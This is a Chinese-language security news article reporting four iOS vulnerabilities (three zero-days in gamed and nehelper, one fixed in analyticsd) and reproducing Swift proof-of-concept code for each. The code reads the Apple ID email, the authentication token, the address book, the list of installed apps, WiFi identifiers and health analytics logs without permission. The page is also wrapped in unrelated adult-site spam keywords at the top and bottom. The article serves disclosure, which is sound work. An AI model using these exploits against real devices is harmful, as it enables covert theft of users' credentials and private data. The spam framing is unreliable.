成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

研究人員發現三個iOS 0 day漏洞PoC代碼

安全 漏洞
GitHub用戶illusionofchaos在GitHub上發布了4個iOS 安全漏洞的PoC代碼,其中包含3個0 day漏洞和1個已修復的安全漏洞。

[[425782]]

研究人員發現3個iOS 0 day漏洞PoC代碼。

GitHub用戶illusionofchaos在GitHub上發布了4個iOS 安全漏洞的PoC代碼,其中包含3個0 day漏洞和1個已修復的安全漏洞。這4個漏洞分別是:

  • Gamed 0-day
  • Nehelper Enumerate Installed Apps 0-day
  • Nehelper Wifi Info 0-day
  • Analyticsd (iOS 14.7中已修復)

Gamed 0-day

從APP store中按住那個的應用可以在用戶不知情的情況下訪問以下信息:

  • Apple ID郵箱和Apple ID賬戶的全名;
  • Apple ID認證token,允許以用戶名義訪問*.apple.com上的至少1個終端;
  • Core Duet數據庫的完全文件系統讀權限,其中包含郵箱、SMS、iMessage和第3方消息APP的聯系人,以及與這些聯系人進行用戶交互的元數據;
  • 快速撥號數據庫和地址簿數據庫的完全文件系統讀權限,包括聯系人圖片和其他元數據;

PoC代碼如下:

  1. let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)! 
  2. let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol 
  3. let pid = ProcessInfo.processInfo.processIdentifier 
  4. proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in 
  5.     accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in 
  6.         let appleID = response.credential.accountName 
  7.         let token = response.credential.authenticationToken 
  8.     } 
  9.     utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in 
  10.         let addressBookData = data 
  11.     } 

Nehelper Enumerate Installed Apps 0-day

該漏洞允許任何用戶安裝的APP來確定設備上安裝的APP是否是給定的bundle ID。XPC終端com.apple.nehelper 有一個訪問APP的方法可以接受bundle ID作為參數,并返回含有緩存UUID的數組,緩存的UUID可以用來與設備上安裝的應用的bundle ID進行配對。具體參見/usr/libexec/nehelper的[NEHelperCacheManager onQueueHandleMessage:] :

  1. func isAppInstalled(bundleId: String) -> Bool { 
  2.     let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)! 
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
  4.     xpc_connection_resume(connection) 
  5.     let xdict = xpc_dictionary_create(nil, nil, 0) 
  6.     xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1) 
  7.     xpc_dictionary_set_uint64(xdict, "cache-command", 3) 
  8.     xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId) 
  9.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) 
  10.     if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil { 
  11.         return true 
  12.     } 
  13.     return false 

Nehelper Wifi Info 0-day

XPC終端com.apple.nehelper會接收用戶提供的參數sdk-version,如果該值小于后等于524288,com.apple.developer.networking.wifi-info entiltlement就會跳過。這使得任何符合條件的APP都可以在無需entiltlement的情況下獲取WiFi信息。

  1. func wifi_info() -> String? { 
  2.     let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2) 
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
  4.     xpc_connection_resume(connection) 
  5.     let xdict = xpc_dictionary_create(nil, nil, 0) 
  6.     xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10) 
  7.     xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely 
  8.     xpc_dictionary_set_string(xdict, "interface-name", "en0") 
  9.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) 
  10.     if let result = xpc_dictionary_get_value(reply, "result-data") { 
  11.         let ssid = String(cString: xpc_dictionary_get_string(result, "SSID")) 
  12.         let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID")) 
  13.         return "SSID: \(ssid)\nBSSID: \(bssid)" 
  14.     } else { 
  15.         return nil 
  16.     } 

Analyticsd (iOS 14.7中已修復)

該漏洞允許任意用戶安裝的APP訪問分析日志。這些日志中含有以下信息:

  • 醫療信息,包括心跳、異常心律事件等;
  • 設備使用信息,包括推送通知數和用戶的行為等;
  • 屏幕時間信息和給定bundle ID的所有有用的會話數;
  • Safari中用戶查看的web頁面的語言;
  • 設備配件的信息,包括廠商、型號、固件版本和用戶分配的名字;
  1. func analytics_json() -> String? { 
  2. let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2) 
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
  4.     xpc_connection_resume(connection) 
  5. let xdict = xpc_dictionary_create(nil, nil, 0) 
  6.     xpc_dictionary_set_string(xdict, "command", "log-dump"); 
  7.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict); 
  8.     return xpc_dictionary_get_string(reply, "log-dump"); 

更多參見:https://habr.com/ru/post/579714/

 

責任編輯:趙寧寧 來源: 嘶吼網
相關推薦

2021-09-26 14:04:14

iOS零日漏洞漏洞

2011-08-23 13:37:47

2014-12-25 09:51:32

2021-09-28 07:59:04

蘋果 iOS 15 漏洞

2020-10-14 10:39:50

漏洞網絡攻擊網絡安全

2014-11-07 10:37:57

2022-10-09 11:03:46

漏洞宜家智能燈泡

2024-10-11 16:40:22

2022-01-06 11:10:01

漏洞網絡安全網絡攻擊

2011-10-28 09:03:39

2020-08-12 08:08:02

安全漏洞數據

2023-07-07 15:44:12

漏洞網絡安全

2011-10-28 10:17:11

2021-12-06 13:37:29

路由器漏洞安全

2012-02-16 08:27:14

安全漏洞RSA算法

2013-01-23 09:34:32

2020-11-11 12:08:36

iOS 0 day漏洞攻擊

2012-03-23 09:28:14

2010-07-29 16:43:46

2010-04-19 10:32:07

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 午夜羞羞| 精品亚洲永久免费精品 | 国产美女高潮 | 国产精品视频网站 | 日韩精品一二三 | 三极网站 | 亚洲a视| 精品国产黄a∨片高清在线 成人区精品一区二区婷婷 日本一区二区视频 | 中文字幕成人av | 99re视频这里只有精品 | 久久精品一级 | 亚洲一区在线播放 | 狠狠入ady亚洲精品经典电影 | 久久久久久网站 | 亚洲在线一区 | 欧美一区二区免费 | 亚洲精品电影网在线观看 | 成人免费在线观看 | 亚洲久在线 | 欧美黑人一级爽快片淫片高清 | 99视频在线播放 | 国产欧美一区二区三区在线看 | 亚洲欧美日韩成人在线 | 精品视频网 | 日韩一区二区在线视频 | 91免费视频| 一区二区三区国产 | 九九导航 | 亚洲第一网站 | 国产精品亚洲精品日韩已方 | 国产精品免费观看视频 | 欧美精品a∨在线观看不卡 欧美日韩中文字幕在线播放 | 黄色大片在线免费观看 | 欧美 日韩 亚洲91麻豆精品 | 久久综合激情 | 久久久综合 | 国产精品日日摸夜夜添夜夜av | 国产精品久久 | 日韩av啪啪网站大全免费观看 | www.9191.com| 国产在线高清 |